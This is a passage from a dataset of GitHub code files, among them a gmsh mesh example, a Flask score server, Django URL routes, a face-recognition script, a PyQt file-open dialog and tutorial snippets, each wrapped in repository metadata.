# z\n\n# 9 values to be interpolated 2nd order basis functions\nquad.extend([1., 1., 1., 1., 3., 3., 3., 3., -3.])\n\n# interpolation matrices c[i][j] and e[i][j] defining the d = 9\n# basis functions, i = 0, ..., d-1:\n#\n# f[i](u, v, w) = sum_(j = 0, ..., d - 1) c[i][j] u^e[j][0] v^e[j][1] w^e[j][2],\n#\n# with u, v, w the coordinates in the reference element\ngmsh.view.setInterpolationMatrices(t2, \"Quadrangle\", 9,\n [0, 0, 0.25, 0, 0, -0.25, -0.25, 0, 0.25,\n 0, 0, 0.25, 0, 0, -0.25, 0.25, 0, -0.25,\n 0, 0, 0.25, 0, 0, 0.25, 0.25, 0, 0.25,\n 0, 0, 0.25, 0, 0, 0.25, -0.25, 0, -0.25,\n 0, 0, -0.5, 0.5, 0, 0.5, 0, -0.5, 0,\n 0, 0.5, -0.5, 0, 0.5, 0, -0.5, 0, 0,\n 0, 0, -0.5, 0.5, 0, -0.5, 0, 0.5, 0,\n 0, 0.5, -0.5, 0, -0.5, 0, 0.5, 0, 0,\n 1, -1, 1, -1, 0, 0, 0, 0, 0],\n [0, 0, 0,\n 2, 0, 0,\n 2, 2, 0,\n 0, 2, 0,\n 1, 0, 0,\n 2, 1, 0,\n 1, 2, 0,\n 0, 1, 0,\n 1, 1, 0])\n\ngmsh.view.addListData(t2, \"SQ\", 1, quad)\n\n# adaptive visualization\ngmsh.view.option.setNumber(t2, \"AdaptVisualizationGrid\", 1)\ngmsh.view.option.setNumber(t2, \"TargetError\", 1e-2)\ngmsh.view.option.setNumber(t2, \"MaxRecursionLevel\", 6)\n\n# get adaptive visualization data\ndataType, numElements, data = gmsh.view.getListData(t2, returnAdaptive=True)\n\n# create discrete surface\nsurf = gmsh.model.addDiscreteEntity(2)\n\n# create nodes and elements and add them to the surface\nN = 1\nfor t in range(0, len(dataType)):\n if dataType[t] == 'SQ': # quad\n coord = []\n tags = []\n ele = []\n for q in range(0, numElements[t]):\n coord.extend([data[t][16*q+0], data[t][16*q+4], data[t][16*q+8]])\n coord.extend([data[t][16*q+1], data[t][16*q+5], data[t][16*q+9]])\n coord.extend([data[t][16*q+2], data[t][16*q+6], data[t][16*q+10]])\n coord.extend([data[t][16*q+3], data[t][16*q+7], data[t][16*q+11]])\n tags.extend([N, N+1, N+2, N+3])\n ele.extend([N, N+1, N+2, N+3])\n N = N+4\n gmsh.model.mesh.addNodes(2, 1, tags, coord)\n gmsh.model.mesh.addElementsByType(surf, 3, [], ele)\n\n# remove duplicate nodes\ngmsh.model.mesh.removeDuplicateNodes()\n\n# save mesh\ngmsh.write('test.msh')\n\n# Launch the GUI to see the results:\nif '-nopopup' not in sys.argv:\n gmsh.fltk.run()\n\ngmsh.finalize()\n","repo_name":"live-clones/gmsh","sub_path":"examples/api/view_adaptive_to_mesh.py","file_name":"view_adaptive_to_mesh.py","file_ext":"py","file_size_in_byte":3072,"program_lang":"python","lang":"en","doc_type":"code","stars":71,"dataset":"github-code","pt":"40"} +{"seq_id":"42285028298","text":"from flask import Flask, request\nfrom os import getenv\nimport Utils\nimport Score\n\napp = Flask(\"WOG_SCORES\")\n\n\ndef good_result(good_score):\n return ' \\\n \\\n Scores Game\\\n \\\n \\\n

    The score is
    {' + good_score + '}

    \\\n \\\n '\n\n\ndef bad_result():\n return '\\\n \\\n Scores Game\\\n \\\n \\\n

    {ERROR}

    \\\n \\\n '\n\n\n@app.route('/scores', methods=['GET', 'POST', 'DELETE'])\ndef score(inp_score=0):\n try:\n inp_score=int(request.values['score'])\n except:\n None\n if request.method == 'POST':\n try:\n rc = Score.add_score(Utils.SCORES_FILE_NAME, inp_score)\n if rc == Utils.BAD_RETURN_CODE:\n raise ValueError(\"Wrong value\")\n new_score = Score.get_score(Utils.SCORES_FILE_NAME)\n html_result = good_result(new_score)\n\n except:\n html_result = bad_result()\n\n elif request.method == 'GET':\n try:\n new_score=Score.get_score(Utils.SCORES_FILE_NAME)\n print (new_score)\n html_result = good_result(new_score)\n\n except:\n html_result=bad_result()\n elif request.method == 'DELETE':\n try:\n rc=Score.reset_score(Utils.SCORES_FILE_NAME)\n html_result = good_result(\"0\")\n\n except:\n html_result=bad_result()\n return html_result\n\n\n@app.route('/')\ndef my_func():\n return \"hello and welcome to the world of games\"\n\n\napp.run(host=\"0.0.0.0\", port=5001)\n","repo_name":"lenats03/WoG","sub_path":"MainScores.py","file_name":"MainScores.py","file_ext":"py","file_size_in_byte":1831,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"42140365395","text":"from django.urls import path\nfrom .events import views as eventViews\nfrom .clubs import views as clubViews\nfrom .users import views as userViews\nfrom .auth import views as authViews\n\nurlpatterns = [\n path('events', eventViews.manage_events, name='events'),\n path('events/series', eventViews.list_event_series, name='events-series'),\n path('events/categories', eventViews.list_event_categories, name='events-categories'),\n path('events/headings', eventViews.list_table_headings, name='events-headings'),\n path('events/', eventViews.list_event_details, name='events-id'),\n path('clubs', clubViews.list_clubs, name='clubs'),\n path('users', userViews.create, name='users'),\n path('users/', userViews.get_profile_details, name='users-details'),\n path('auth/getToken', authViews.get_csrf_token, name='auth-get-token'),\n path('auth/getSession', authViews.get_session, name='auth-get-session'),\n path('auth/login', authViews.login_view, name='auth-login')\n]\n","repo_name":"dawidK5/FYP-Event-Mgmt","sub_path":"api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1013,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"36077013930","text":"import numpy as np\n\n\ndef NCA_ss1(self, y, ybar, muR_ref):\n \"\"\"\n This function was obtained from Dan Cogswell's fit of Samsung\n data.\n \"\"\"\n OCV = (3.86 + 1.67*y - 9.52*y**2 + 15.04*y**3 - 7.95*y**4\n - 0.06*np.log(y/(1-y)))\n muR = self.get_muR_from_OCV(OCV, muR_ref)\n actR = None\n return muR, actR\n","repo_name":"TRI-AMDD/mpet","sub_path":"mpet/electrode/materials/NCA_ss1.py","file_name":"NCA_ss1.py","file_ext":"py","file_size_in_byte":330,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"40"} +{"seq_id":"8508583841","text":"import face_recognition\nimport os\nimport sys\n\nknown_labels = []\nknown_faces = []\n\nbase_path = os.getcwd() + \"/\" + sys.argv[1]\nlearning_path = base_path + \"/learning/\"\ntest_path = base_path + \"/test/\"\n\nfor file in os.listdir(learning_path):\n face = face_recognition.load_image_file(learning_path + file)\n label = file.split('.')[0]\n\n known_labels.append(label)\n known_faces.append(face_recognition.face_encodings(face)[0])\n\n\nunknown_image = 
face_recognition.load_image_file(test_path + os.listdir(test_path)[0])\nunknown_face_encoding = face_recognition.face_encodings(unknown_image)[0]\n\nresults = face_recognition.compare_faces(known_faces, unknown_face_encoding)\n\nfor i in range(len(results)):\n print(\"Is it {}? - {}\".format(known_labels[i], results[i]))\n","repo_name":"katebennu/face-recognition","sub_path":"one-photo-per-person/recognize.py","file_name":"recognize.py","file_ext":"py","file_size_in_byte":770,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"71794671800","text":"#!/usr/bin/python\n\n# [scenemanager] file_open.py\n#\n# Mike Bonnington \n# (c) 2019\n#\n# Scene Manager - Open File Dialog\n# A UI for opening files/scenes/scripts.\n\n\nimport datetime\n# import fnmatch\n# import glob\nimport os\nimport re\n# import sys\n# import time\n# import traceback\n\nfrom Qt import QtCore, QtGui, QtWidgets\n\n# Import custom modules\nimport ui_template as UI\n\nfrom . import convention\nfrom shared import os_wrapper\n# from shared import recent_files\nfrom shared import verbose\n\n# ----------------------------------------------------------------------------\n# Configuration\n# ----------------------------------------------------------------------------\n\nVERSION = \"0.1.0\"\n\ncfg = {}\n\n# Set window title and object names\ncfg['window_object'] = \"fileOpenUI\"\nif os.environ['SCNMGR_VENDOR_INITIALS']:\n\tcfg['window_title'] = \"%s Open\" % os.environ['SCNMGR_VENDOR_INITIALS']\nelse:\n\tcfg['window_title'] = \"Open\"\n\n# Set the UI and the stylesheet\ncfg['ui_file'] = 'file_open.ui'\ncfg['stylesheet'] = 'style.qss' # Set to None to use the parent app's stylesheet\n\n# Other options\ncfg['prefs_file'] = os.path.join(\n\tos.environ['SCNMGR_USER_PREFS_DIR'], 'scenemanager_prefs.json')\ncfg['store_window_geometry'] = True\n\n# ----------------------------------------------------------------------------\n# Begin main window class\n# ----------------------------------------------------------------------------\n\nclass FileOpenUI(QtWidgets.QDialog, UI.TemplateUI):\n\t\"\"\" File Open UI.\n\t\"\"\"\n\tdef __init__(self, parent=None, session=None):\n\t\tsuper(FileOpenUI, self).__init__(parent)\n\t\tself.parent = parent\n\t\tself.session = session\n\n\t\tself.base_dir = os.environ['SCNMGR_SAVE_DIR']\n\t\tself.file_ext = os.environ['SCNMGR_FILE_EXT'].split(os.pathsep)\n\n\t\tself.setupUI(**cfg)\n\t\tself.conformFormLayoutLabels(self.ui)\n\n\t\t# Set window icon, flags and other Qt attributes\n\t\tself.setWindowFlags(QtCore.Qt.Dialog)\n\n\t\t# Set icons\n\t\tself.ui.shot_toolButton.setIcon(self.iconSet('filmgrain.svg'))\n\t\tself.ui.refresh_toolButton.setIcon(self.iconSet('icon_refresh.png'))\n\t\tself.ui.nativeDialog_toolButton.setIcon(self.iconSet('folder-open.svg'))\n\n\t\t# Connect signals & slots\n\t\t# self.ui.shot_toolButton.clicked.connect(self.setShot)\n\t\t# self.ui.shotChange_toolButton.clicked.connect(self.setShot)\n\t\t# self.ui.shotReset_toolButton.clicked.connect(self.resetShot)\n\n\t\t# self.ui.shot_lineEdit.textChanged.connect(self.updateFilters) # disabled as this call should be done explicitly when shot is 
(re)set\n\t\tself.ui.discipline_comboBox.currentIndexChanged.connect(self.updateFilters)\n\t\tself.ui.artist_comboBox.currentIndexChanged.connect(self.updateFilters)\n\t\tself.ui.versionAll_radioButton.toggled.connect(self.updateView)\n\t\tself.ui.versionLatest_radioButton.toggled.connect(self.updateView)\n\n\t\tself.ui.refresh_toolButton.clicked.connect(self.updateView)\n\t\tself.ui.nativeDialog_toolButton.clicked.connect(self.nativeDialog)\n\n\t\tself.ui.fileBrowser_treeWidget.itemSelectionChanged.connect(self.updateSelection)\n\n\t\tself.ui.buttonBox.button(QtWidgets.QDialogButtonBox.Open).clicked.connect(self.openFile)\n\t\tself.ui.buttonBox.button(QtWidgets.QDialogButtonBox.Cancel).clicked.connect(self.close)\n\n\t\t# # Context menus\n\t\t# self.addContextMenu(self.ui.shot_toolButton, \"Change\", self.setShot)\n\t\t# self.addContextMenu(self.ui.shot_toolButton, \"Reset to current\", self.resetShot)\n\n\t\t# Restore widget state\n\t\tself.restoreView()\n\n\t\t# Define global variables\n\t\tself.time_format_str = \"%Y/%m/%d %H:%M:%S\"\n\n\t\t# # Show initialisation message\n\t\t# info_ls = []\n\t\t# for key, value in self.getInfo().items():\n\t\t# \tinfo_ls.append(\"{} {}\".format(key, value))\n\t\t# info_str = \" | \".join(info_ls)\n\t\t# verbose.message(\"%s v%s\" % (cfg['window_title'], VERSION))\n\t\t# verbose.print_(info_str)\n\n\n\tdef display(self):\n\t\t\"\"\" Display the window.\n\t\t\"\"\"\n\t\tself.returnValue = False\n\n\t\tself.setWindowTitle(\"%s - %s\" % (cfg['window_title'], os.environ['SCNMGR_JOB']))\n\n\t\tself.ui.shot_lineEdit.setText(os.environ['SCNMGR_SHOT']) #.replace('/', '_')\n\t\tself.ui.shot_toolButton.setEnabled(False) # temp until implemented\n\n\t\tself.populateComboBox(\n\t\t\tself.ui.discipline_comboBox, \n\t\t\tself.getDisciplines(), \n\t\t\tblockSignals=True)\n\n\t\tself.populateComboBox(\n\t\t\tself.ui.artist_comboBox, \n\t\t\tself.getArtists(), \n\t\t\tblockSignals=True)\n\n\t\tself.updateFilters()\n\t\t# self.updateView() # already called from updateFilters()\n\t\tself.updateSelection()\n\n\t\tself.show()\n\t\tself.raise_()\n\n\t\treturn self.returnValue\n\n\n\t# @QtCore.Slot()\n\tdef updateSelection(self):\n\t\t\"\"\" Enable/disable 'Open' button depending on current selection.\n\t\t\"\"\"\n\t\t# No items selected...\n\t\tif len(self.ui.fileBrowser_treeWidget.selectedItems()) == 0:\n\t\t\tself.ui.buttonBox.button(QtWidgets.QDialogButtonBox.Open).setEnabled(False)\n\t\t# More than one item selected...\n\t\telse:\n\t\t\tself.ui.buttonBox.button(QtWidgets.QDialogButtonBox.Open).setEnabled(True)\n\n\n\t# @QtCore.Slot()\n\tdef updateFilters(self):\n\t\t\"\"\" Update the search filter arguments when the widgets' values are\n\t\t\tmodified.\n\t\t\"\"\"\n\t\tshot = self.ui.shot_lineEdit.text().replace('/', '_')\n\t\tdiscipline = self.ui.discipline_comboBox.currentText()\n\t\tartist = self.ui.artist_comboBox.currentText()\n\n\t\t# self.generateFilter(shot, discipline, artist)\n\t\tself.file_filter = convention.generate_filter(\n\t\t\tshot=shot, \n\t\t\tdiscipline=discipline, \n\t\t\tartist=artist)\n\t\tself.updateView()\n\n\n\tdef updateView(self):\n\t\t\"\"\" Update the file browser.\n\t\t\"\"\"\n\t\ttry:\n\t\t\tverbose.debug(\"updateView called from %s\" % self.sender().objectName())\n\t\texcept:\n\t\t\tverbose.debug(\"updateView called explicitly\")\n\n\t\tshow_latest = self.ui.versionLatest_radioButton.isChecked()\n\n\t\t# Clear tree widget\n\t\tself.ui.fileBrowser_treeWidget.clear()\n\n\t\t# Generate a master list of all files matching the naming 
convention\n\t\t# to compare against\n\t\tmatches_latest = convention.get_latest(\n\t\t\tconvention.match_files(\n\t\t\t\tself.base_dir, \n\t\t\t\tconvention.generate_filter(\n\t\t\t\t\tshot=self.ui.shot_lineEdit.text().replace('/', '_'))))\n\n\t\t# Get list of files that match filters\n\t\t# matches = self.matchFiles(self.file_filter)\n\t\tmatches = convention.match_files(self.base_dir, self.file_filter)\n\t\t# matches_latest = convention.get_latest(matches)\n\n\t\tif show_latest:\n\t\t\t# matches = matches_latest\n\t\t\tmatches = convention.get_latest(matches)\n\n\t\t# Add entries to tree widget\n\t\tfor item in matches:\n\t\t\tfileItem = QtWidgets.QTreeWidgetItem(self.ui.fileBrowser_treeWidget)\n\t\t\tif item in matches_latest:\n\t\t\t\tfileItem.setIcon(0, self.iconSet('starred.svg'))\n\t\t\telse:\n\t\t\t\tfileItem.setIcon(0, self.iconSet('empty.png'))\n\t\t\t\tfileItem.setForeground(0, self.col['disabled'])\n\t\t\tfileItem.setText(0, os.path.basename(item))\n\t\t\tfileItem.setText(1, str(os.path.getsize(item)))\n\t\t\ttimestamp = os.path.getmtime(item)\n\t\t\ttimestr = datetime.datetime.fromtimestamp(timestamp).strftime(self.time_format_str)\n\t\t\tfileItem.setText(2, timestr)\n\t\t\tif self.getArtist(item) != os.environ['SCNMGR_USER']:\n\t\t\t\tfileItem.setForeground(3, self.col['disabled'])\n\t\t\tfileItem.setText(3, self.getArtist(item))\n\t\t\tfileItem.setText(4, os.path.normpath(item))\n\n\t\t\tself.ui.fileBrowser_treeWidget.addTopLevelItem(fileItem)\n\n\t\t# Hide last column\n\t\tself.ui.fileBrowser_treeWidget.setColumnHidden(4, True)\n\n\t\t# Sort by submit time column - move this somewhere else?\n\t\t# self.ui.fileBrowser_treeWidget.sortByColumn(2, QtCore.Qt.DescendingOrder)\n\n\n\tdef getDisciplines(self):\n\t\t\"\"\" Return a list of disciplines.\n\t\t\"\"\"\n\t\tfrom shared import disciplines\n\t\treturn [\"[any]\"] + disciplines.disciplines\n\n\n\tdef getArtists(self):\n\t\t\"\"\" Return a list of artists. 
Calculate from all the subdirectories\n\t\t\tof base dir plus the current username.\n\t\t\"\"\"\n\t\tartists = [\"[any]\", os.environ['SCNMGR_USER']]\n\n\t\tsubdirs = next(os.walk(self.base_dir))[1]\n\t\tif subdirs:\n\t\t\tfor subdir in subdirs:\n\t\t\t\tif not subdir.startswith('.'): # ignore hidden directories\n\t\t\t\t\tif subdir not in artists:\n\t\t\t\t\t\tartists.append(subdir)\n\n\t\treturn artists\n\n\n\tdef getArtist(self, filepath):\n\t\t\"\"\" Return the artist name based on the filepath.\n\t\t\"\"\"\n\t\t# dirname = os.path.dirname(filepath)\n\t\t# artist = os.path.split(dirname)[-1]\n\t\t# return artist\n\t\tmeta = convention.parse(filepath)\n\t\treturn meta['']\n\n\n\tdef restoreView(self):\n\t\t\"\"\" Restore and apply saved state of tree widgets.\n\t\t\"\"\"\n\t\ttry:\n\t\t\t# self.ui.splitter.restoreState(self.settings.value(\"splitterSizes\")) #.toByteArray())\n\t\t\tself.ui.fileBrowser_treeWidget.header().restoreState(self.settings.value(\"fileBrowserView\")) #.toByteArray())\n\t\texcept:\n\t\t\tpass\n\n\n\t# def resetView(self):\n\t# \t\"\"\" Reset state of tree widgets to default.\n\t# \t\"\"\"\n\t# \tself.settings.remove(\"fileBrowserView\")\n\n\n\tdef openFile(self):\n\t\t\"\"\" Dialog accept function.\n\t\t\"\"\"\n\t\ttry:\n\t\t\tfor item in self.ui.fileBrowser_treeWidget.selectedItems():\n\t\t\t\tfilename = item.text(4)\n\n\t\texcept ValueError:\n\t\t\tverbose.error(\"Nothing selected.\")\n\t\t\treturn False\n\n\t\tif self.session.file_open(filename):\n\t\t\tself.returnValue = filename\n\t\t\tself.accept()\n\n\n\tdef nativeDialog(self):\n\t\t\"\"\" Open file using application-native dialog.\n\t\t\"\"\"\n\t\tself.hide()\n\n\t\tif self.session.file_open_native_dialog():\n\t\t\tself.close()\n\t\telse: # Return to custom dialog\n\t\t\tself.show()\n\n\n\t# def keyPressEvent(self, event):\n\t# \t\"\"\" Override function to prevent Enter / Esc keypresses triggering\n\t# \t\tOK / Cancel buttons.\n\t# \t\"\"\"\n\t# \tif event.key() == QtCore.Qt.Key_Return \\\n\t# \tor event.key() == QtCore.Qt.Key_Enter:\n\t# \t\treturn\n\n\n\tdef closeEvent(self, event):\n\t\t\"\"\" Event handler for when window is closed. 
Save settings, store\n\t\t\twindow geometry and state of certain widgets\n\t\t\"\"\"\n\t\tself.save()\n\t\tself.storeWindow()\n\t\tself.settings.setValue(\n\t\t\t\"fileBrowserView\", \n\t\t\tself.ui.fileBrowser_treeWidget.header().saveState())\n\n# ----------------------------------------------------------------------------\n# End of main window class\n# ============================================================================\n# Run functions\n# ----------------------------------------------------------------------------\n\ndef dialog(session, app='standalone'):\n\t\"\"\" Instantiate UI object parented to appropriate app's main window\n\t\"\"\"\n\tif app == 'standalone':\n\t\tpass\n\telif app == 'maya':\n\t\tparent = UI._maya_main_window()\n\telif app == 'houdini':\n\t\tparent = UI._houdini_main_window()\n\telif app == 'nuke':\n\t\tparent = UI._nuke_main_window()\n\n\treturn FileOpenUI(parent=parent, session=session)\n","repo_name":"mjbonnington/icarus-gps","sub_path":"tools/scenemanager/file_open.py","file_name":"file_open.py","file_ext":"py","file_size_in_byte":10259,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
+{"seq_id":"43987717516","text":"import networkx as nx\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nclass CommunityNetworkBuild(object):\n def __init__(self, nodes, M, pin, pout):\n \"\"\"\n :param nodes: number of nodes in the network\n :param M: number of communities\n :param M_nodes: number of nodes per community (derived as nodes/M)\n :param pin: probability of an edge within a community\n :param pout: probability of an edge between communities\n \"\"\"\n self.nodes = nodes\n self.M = M\n self.M_nodes = self.nodes/self.M\n self.pin = pin\n self.pout = pout\n\n\ndef main():\n CommunityNetworkBuild(128, 8, 0.7, 0.01)\n\nif __name__ == '__main__':\n main()\n","repo_name":"ArvinYan26/Python_Learning","sub_path":"1. 2020年学习/5月份学习/1. 第一, 二 周学习/3. 函数,面向对象实现分类(5月4号)/面向对象构建社区网络.py","file_name":"面向对象构建社区网络.py","file_ext":"py","file_size_in_byte":616,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
+{"seq_id":"73295375479","text":"# # Recursions\r\n# def print2(str1):\r\n# print2(str1)\r\n# print( \"this is \"+ str1)\r\n# print2(\"tushar\")\r\n#\r\n# # if we use the function print2(str1) inside this function with no base case,\r\n# # it raises a recursion error\r\n# Now we are making a new function called factorial\r\ndef factorial_iterative(r):\r\n '''\r\n\r\n :param r:Integer\r\n :return: n*n-1 * n-2 * n-3.........1\r\n '''\r\n fac =1\r\n for i in range(r):\r\n fac = fac *(i+1)\r\n return(fac)\r\n\r\n\r\n# formula of factorial = 5*4*3*2*1\r\n# n! = n*n-1*n-2*n-3.....1\r\n# n! 
= n *(n-1)!\r\nnumber = int(input(\"enter the number:\"))\r\nprint(\"Factorial of the number using iterative method\",factorial_iterative(number))\r\n# Now we make the function using recursive method\r\ndef factorial_recursive(r):\r\n '''\r\n\r\n :param r:Integer\r\n :return: n*n-1 * n-2 * n-3.........1\r\n '''\r\n if r==1:\r\n return 1\r\n else:\r\n return r * factorial_recursive(r-1)\r\n # Logic of this function\r\n# 5 * factorial_recursive(4)\r\n# 5 * 4 * factorial_recursive(3)\r\n# 5 * 4*3factorial_recursive(2)\r\n# 5*4*3*2*factorial_recursive(1)\r\n# 5*4*3*2*1 = 120\r\nnum = int(input(\"enter the number:\"))\r\nprint(\"Factorial of the number using recursive method\",factorial_recursive(num))\r\ndef tri_recursion(k):\r\n if(k>0):\r\n result = k+tri_recursion(k-1)\r\n print(result)\r\n else:\r\n result = 0\r\n return result\r\nx = int(input(\"enter the number of your choice\"))\r\nprint(\"\\n\\nRecursion Example Results\")\r\nprint(tri_recursion(x))","repo_name":"tush-tr/python-practice-projects","sub_path":"learning-stuff-for-python-basic/py_tuts/tut34_recursion.py","file_name":"tut34_recursion.py","file_ext":"py","file_size_in_byte":1476,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"26715735920","text":"\"\"\"Gissell URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/2.2/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. 
Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\n\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib import admin\nfrom django.urls import include, path\nfrom .views import IndexView, PersonaLista, PersonaCreate, PersonaActualizar, PersonaEliminar, \\\n TipoPersonaLista, TipoPersonaCreate, TipoPersonaActualizar, TipoPersonaEliminar, \\\n TipoPersonaPersonaLista, TipoPersonaPersonaCreate, TipoPersonaPersonaActualizar, TipoPersonaPersonaEliminar, \\\n TerapiaLista, TerapiaCreate, TerapiaActualizar, TerapiaEliminar, TipoTerapiaLista, TipoTerapiaCreate, \\\n TipoTerapiaActualizar, TipoTerapiaEliminar, DonacionLista, DonacionCreate, DonacionActualizar, DonacionEliminar, \\\n TipoDonacionCreate, TipoDonacionLista, TipoDonacionActualizar, TipoDonacionEliminar, CursoLista, CursoCreate, \\\n CursoActualizar, CursoEliminar, AsignacionLista, AsignacionCreate, AsignacionActualizar, AsignacionEliminar, \\\n NotaLista, NotaCreate, NotaActualizar, NotaEliminar, UnidadLista, UnidadCreate, UnidadActualizar, UnidadEliminar, \\\n generar_pdf_personas, generar_pdf_notas\n\napp_name = 'Admin'\n\nurlpatterns = [\n path('', login_required(IndexView.as_view()), name='Home'),\n # Persona\n path('lista-persona', login_required(PersonaLista.as_view()), name='persona_list'),\n path('crear-persona', login_required(PersonaCreate.as_view()), name='persona_create'),\n path('actualizar-persona//', login_required(PersonaActualizar.as_view()), name='persona_update'),\n path('eliminar-persona//', login_required(PersonaEliminar.as_view()), name='persona_delete'),\n # Tipo Persona\n path('lista-tipo-persona', login_required(TipoPersonaLista.as_view()), name='tipo_persona_list'),\n path('crear-tipo-persona', login_required(TipoPersonaCreate.as_view()), name='tipo_persona_create'),\n path('actualizar-tipo-persona//', login_required(TipoPersonaActualizar.as_view()), name='tipo_persona_update'),\n path('eliminar-tipo-persona//', login_required(TipoPersonaEliminar.as_view()), name='tipo_persona_delete'),\n # Tipo Persona Persona\n path('lista-tipo-persona-persona', login_required(TipoPersonaPersonaLista.as_view()), name='tipo_persona_persona_list'),\n path('crear-tipo-persona-persona', login_required(TipoPersonaPersonaCreate.as_view()), name='tipo_persona_persona_create'),\n path('actualizar-tipo-persona/persona//', login_required(TipoPersonaPersonaActualizar.as_view()), name='tipo_persona_persona_update'),\n path('eliminar-tipo-persona/persona//', login_required(TipoPersonaPersonaEliminar.as_view()), name='tipo_persona_persona_delete'),\n # Terapia\n path('lista-terapia', login_required(TerapiaLista.as_view()), name='terapia_list'),\n path('crear-terapia', login_required(TerapiaCreate.as_view()), name='terapia_create'),\n path('actualizar-terapia//', login_required(TerapiaActualizar.as_view()), name='terapia_update'),\n path('eliminar-terapia//', login_required(TerapiaEliminar.as_view()), name='terapia_delete'),\n # Tipo Terapia\n path('lista-tipo-terapia', login_required(TipoTerapiaLista.as_view()), name='tipo_terapia_list'),\n path('crear-tipo-terapia', login_required(TipoTerapiaCreate.as_view()), name='tipo_terapia_create'),\n path('actualizar-tipo-terapia//', login_required(TipoTerapiaActualizar.as_view()), name='tipo_terapia_update'),\n path('eliminar-tipo-terapia//', login_required(TipoTerapiaEliminar.as_view()), name='tipo_terapia_delete'),\n # Donacion\n path('lista-donacion', login_required(DonacionLista.as_view()), name='donacion_list'),\n path('crear-donacion', 
login_required(DonacionCreate.as_view()), name='donacion_create'),\n path('actualizar-donacion//', login_required(DonacionActualizar.as_view()), name='donacion_update'),\n path('eliminar-donacion//', login_required(DonacionEliminar.as_view()), name='donacion_delete'),\n # Tipo Donacion\n path('lista-tipo-donacion', login_required(TipoDonacionLista.as_view()), name='tipo_donacion_list'),\n path('crear-tipo-donacion', login_required(TipoDonacionCreate.as_view()), name='tipo_donacion_create'),\n path('actualizar-tipo-donacion//', login_required(TipoDonacionActualizar.as_view()), name='tipo_donacion_update'),\n path('eliminar-tipo-donacion//', login_required(TipoDonacionEliminar.as_view()), name='tipo_donacion_delete'),\n # Tipo Curso\n path('lista-curso', login_required(CursoLista.as_view()), name='curso_list'),\n path('crear-curso', login_required(CursoCreate.as_view()), name='curso_create'),\n path('actualizar-curso//', login_required(CursoActualizar.as_view()), name='curso_update'),\n path('eliminar-curso//', login_required(CursoEliminar.as_view()), name='curso_delete'),\n # Asignación\n path('lista-asignacion', login_required(AsignacionLista.as_view()), name='asignacion_list'),\n path('crear-asignacion', login_required(AsignacionCreate.as_view()), name='asignacion_create'),\n path('actualizar-asignacion//', login_required(AsignacionActualizar.as_view()), name='asignacion_update'),\n path('eliminar-asignacion//', login_required(AsignacionEliminar.as_view()), name='asignacion_delete'),\n # Nota\n path('lista-nota', login_required(NotaLista.as_view()), name='nota_list'),\n path('crear-nota', login_required(NotaCreate.as_view()), name='nota_create'),\n path('actualizar-nota//', login_required(NotaActualizar.as_view()), name='nota_update'),\n path('eliminar-nota//', login_required(NotaEliminar.as_view()), name='nota_delete'),\n # Unidad\n path('lista-unidad', login_required(UnidadLista.as_view()), name='unidad_list'),\n path('crear-unidad', login_required(UnidadCreate.as_view()), name='unidad_create'),\n path('actualizar-unidad//', login_required(UnidadActualizar.as_view()), name='unidad_update'),\n path('eliminar-unidad//', login_required(UnidadEliminar.as_view()), name='unidad_delete'), \n # Reporte\n path('reporte-personas', login_required(generar_pdf_personas), name='reporte_personas'),\n path('reporte-notas', login_required(generar_pdf_notas), name='reporte_notas'),\n]","repo_name":"GerberMaldonado/Gissell","sub_path":"Gissell/Apps/Admin/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":6837,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"39923272708","text":"''' API '''\n\n# Base URL for make API calls\nSERVER_URL = 'https://carlos-carvacrack.ddns.net'\n\n\n''' Stablished API Calls for ServerPipeline\n\n Variables:\n LOGIN_CALL\n UPDATE_TOKE_CALL\n CHECK_TOKEN_CALL\n '''\n# API Calls\nLOGIN_CALL = SERVER_URL + '/modular/api/v1/oauth/login'\nUPDATE_TOKEN_CALL = SERVER_URL + '/modular/api/v1/oauth/update-token'\nCHECK_TOKEN_CALL = SERVER_URL + '/modular/api/v1/oauth/verify-token'\n\n\n# Product API Calls\nADD_PRODUCT_CALL = SERVER_URL + '/modular/api/v1/product/scrap'\nUPDATE_PRODUCT_CALL = SERVER_URL + \\\n '/modular/api/v1/product/scrap/?sku={sku}&upc={upc}&store={store}'\nGET_ALL_PRODUCT_CALL = SERVER_URL + \\\n '/modular/api/v1/product?limit=10000000&offset=0'\n\n\n''' \n Constants used in sitemap.py. 
